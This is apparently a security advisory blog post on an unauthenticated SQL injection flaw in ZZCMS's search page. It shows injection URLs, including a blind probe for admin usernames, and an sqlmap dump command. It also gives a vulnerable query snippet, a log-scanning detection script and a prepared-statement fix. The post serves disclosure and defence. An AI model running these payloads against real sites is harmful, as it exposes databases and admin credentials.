ZZCMS is a widely used, open-source content management system popular among small businesses and personal blogs in Asia. Recently, a nasty vulnerability has been discovered in its front-end — tracked as CVE-2025-22957 — that lets attackers launch SQL injection attacks without even logging in. This blog post will break down what’s going on, how attackers can exploit it, and show you simple code snippets that prove the point. If you’re running ZZCMS 2023 or earlier, you'll want to read this and patch ASAP!

What’s CVE-2025-22957?

ZZCMS (versions 2023 and below) fails to properly sanitize user-provided input on its front-end, specifically in the way it handles query parameters in GET requests. This carelessness means anyone on the public internet could send powerful SQL commands directly to your database — no password or login required.

Let’s suppose ZZCMS exposes URLs like this for product listings:

https://yourdomain.com/search.php?keywords=shoes

The content of keywords is placed directly into an SQL query without escaping, like so:

// In search.php (simplified for illustration)
$sql = "SELECT * FROM products WHERE name LIKE '%" . $_GET['keywords'] . "%'";

The Attacker’s Injection

By simply tweaking the URL, an attacker can end the intended SQL and run their own commands. For example:

https://yourdomain.com/search.php?keywords='; OR 1=1--

What does this do?

The SQL on the backend becomes:

SELECT * FROM products WHERE name LIKE '%' OR 1=1-- %'

The part after -- is ignored as a comment, so this query returns all products, because OR 1=1 is always true. The attacker can do a lot worse than this. They can extract database info, dump user tables, and more.

Realistic Exploit Demo

Let's say the attacker wants to leak usernames and passwords from the zzcms_admin table.

Step 1: Find the vulnerable parameter

Easy, just note that keywords is passed directly.

Suppose the attacker wants to check whether the first character of the first admin username is 'a':

https://yourdomain.com/search.php?keywords='; OR (SELECT SUBSTRING(username,1,1) FROM zzcms_admin LIMIT 1)='a'--

If the page responds differently, they know the guess was correct.

Tools like sqlmap can automate the database dump:

sqlmap -u "https://yourdomain.com/search.php?keywords=test" --dbs --batch

sqlmap will find the injection point and start pulling out all your database names and tables, with no login required.
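On the defensive side, the requests above leave a clear trace in the web server's access log. The following is an added example, not ZZCMS code and not from the advisory: a small PHP triage script that parses combined-format log lines, URL-decodes the query string and reports requests that trip at least two injection indicators. The log lines are constructed for this example; only the search.php path and the keywords parameter come from the post, and the indicator patterns and the two-indicator threshold are my assumptions.

```php
<?php
// Added example, not ZZCMS code: triage a combined-format access log for
// requests carrying the kind of SQL-in-parameter payloads described above.
// The log lines are constructed for this example; only the path and parameter
// name come from the post.
declare(strict_types=1);

// Indicators, matched against the URL-decoded, lower-cased query string.
// Each pattern alone is weak (a search for "o'brien" has a quote, a price
// range has "--"), so a request must hit at least two to be reported.
const SQLI_INDICATORS = [
    'tautology' => '/\'[;\s]*(or|and)\s+[\w\'"]+\s*=\s*[\w\'"]+/',
    'comment'   => '/(--|\/\*|#)/',
    'union'     => '/\bunion\b.*\bselect\b/',
    'subselect' => '/\bselect\b.*\bfrom\b/',
    'blind_fn'  => '/\b(substring|substr|ascii|sleep|benchmark)\s*\(/',
];

// Apache/Nginx combined log format; capture only the fields the triage needs.
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) ([^ "]+) [^"]*" (\d{3}) (\d+|-)/';

function parseLogLine(string $line): ?array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'uri'    => $m[4],
        'status' => (int) $m[5],
        'bytes'  => $m[6] === '-' ? 0 : (int) $m[6],
    ];
}

// Return the names of the indicators that fire on the request's query string.
function scanUri(string $uri): array
{
    $query = parse_url($uri, PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    // Web servers log the raw request line, so decode before matching.
    $decoded = strtolower(urldecode($query));
    $hits = [];
    foreach (SQLI_INDICATORS as $name => $pattern) {
        if (preg_match($pattern, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

function scanLog(array $lines, int $minIndicators = 2): array
{
    $findings = [];
    foreach ($lines as $line) {
        $entry = parseLogLine($line);
        if ($entry === null) {
            continue;
        }
        $hits = scanUri($entry['uri']);
        if (count($hits) >= $minIndicators) {
            $entry['indicators'] = $hits;
            $findings[] = $entry;
        }
    }
    return $findings;
}

// Constructed sample: two ordinary searches, then the two payloads from the post.
$sampleLog = [
    '203.0.113.5 - - [31/Jan/2025:17:20:01 +0000] "GET /search.php?keywords=shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [31/Jan/2025:17:20:02 +0000] "GET /search.php?keywords=o%27brien HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [31/Jan/2025:17:21:10 +0000] "GET /search.php?keywords=%27%3B%20OR%201%3D1-- HTTP/1.1" 200 98304 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [31/Jan/2025:17:21:11 +0000] "GET /search.php?keywords=%27%3B%20OR%20(SELECT%20SUBSTRING(username,1,1)%20FROM%20zzcms_admin%20LIMIT%201)%3D%27a%27-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
];

foreach (scanLog($sampleLog) as $f) {
    // A response far larger than the usual page size corroborates a
    // tautology that returned every product, as the post describes.
    printf("%s %s %s %d %d bytes  indicators: %s\n",
        $f['time'], $f['ip'], $f['uri'], $f['status'], $f['bytes'],
        implode(',', $f['indicators']));
}
```

Run it with `php triage.php` against the embedded sample; only the two requests from 198.51.100.9 are reported (the first with tautology and comment, the second with comment, subselect and blind_fn), while the ordinary searches, including the apostrophe in "o'brien", stay quiet. For a real log, replace `$sampleLog` with `file('/var/log/apache2/access.log', FILE_IGNORE_NEW_LINES)` and raise `$minIndicators` if the site's legitimate query strings are noisy.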

Protect Yourself

- Upgrade ZZCMS immediately: Check the official site for the latest, patched version and apply updates.

- Sanitize inputs: Never concatenate request parameters into SQL. Use prepared statements with bound parameters (PDO or mysqli in PHP), so user input is passed to the database as data and never parsed as SQL.

- Web Application Firewall (WAF): Set up a WAF (like ModSecurity) to block basic SQL injection attempts.
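To make the second item concrete, here is an added example that is not ZZCMS code and not from the advisory: the concatenation pattern from the search.php snippet earlier in the post, beside a version of the same search built on a PDO prepared statement. The table and column names, the DSN and credentials, and the `!` LIKE escape character are assumptions for illustration.

```php
<?php
// Added example, not ZZCMS code: the string-concatenation pattern from the post
// next to a hardened version that uses a PDO prepared statement. Table and
// column names and the DSN are assumptions for illustration.
declare(strict_types=1);

// UNSAFE (the shape described in the post): the user value becomes part of the
// SQL text, so a quote in it ends the string literal and what follows is
// parsed as SQL. Kept only for contrast; never call this with real input.
function buildUnsafeQuery(string $keywords): string
{
    return "SELECT * FROM products WHERE name LIKE '%" . $keywords . "%'";
}

// Prepared statements stop injection, but LIKE has its own metacharacters:
// a user typing "%" would match every row. Escape them with a declared escape
// character ("!" here, an assumption) so user input is matched literally.
function escapeLikePattern(string $value): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $value);
}

// SAFE: the SQL text is fixed at prepare time; the search term travels as a
// bound parameter and is never parsed as SQL, whatever characters it holds.
function searchProducts(PDO $db, string $keywords, int $limit = 50): array
{
    $stmt = $db->prepare(
        "SELECT id, name, price FROM products
         WHERE name LIKE :pattern ESCAPE '!'
         LIMIT :limit"
    );
    $stmt->bindValue(':pattern', '%' . escapeLikePattern($keywords) . '%', PDO::PARAM_STR);
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection helper (DSN and credentials are placeholders). Emulated prepares
// are switched off so the server, not PDO, performs the parameter binding.
function openDatabase(): PDO
{
    return new PDO(
        'mysql:host=localhost;dbname=zzcms;charset=utf8mb4',
        'db_user',
        'db_password',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );
}

// The post's payload as a search term: with the unsafe builder it becomes SQL;
// with the prepared statement it is only a pattern value that matches nothing.
$term = "' OR 1=1--";
echo buildUnsafeQuery($term), PHP_EOL;              // the quote closes the literal early
echo '%' . escapeLikePattern($term) . '%', PHP_EOL; // what the server receives as a bound value

// In search.php, the hardened call would replace the concatenated query:
// $rows = searchProducts(openDatabase(), $_GET['keywords'] ?? '');
```

The two echo lines show the difference without a database: the first prints a query whose WHERE clause has been rewritten by the input, the second prints the plain pattern string that the bound parameter carries. Note that escaping `%` and `_` is a separate concern from injection; without it a prepared statement is still safe, but a search for "%" would return the whole table.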

References

- CVE Detail page for CVE-2025-22957
- ZZCMS downloads & updates
- sqlmap free SQL injection tool
- Wikipedia: SQL injection

Final Words

Ignoring this vulnerability is risky. With CVE-2025-22957, an attacker doesn't even need a password — just a browser and a little knowledge. Patch as soon as possible, and if you can, educate your team about safe database handling, so similar bugs don’t show up in your own code.

If you liked this guide or want more hands-on security tips, please subscribe to our updates!

Timeline

Published on: 01/31/2025 17:15:16 UTC
Last modified on: 03/20/2025 16:15:16 UTC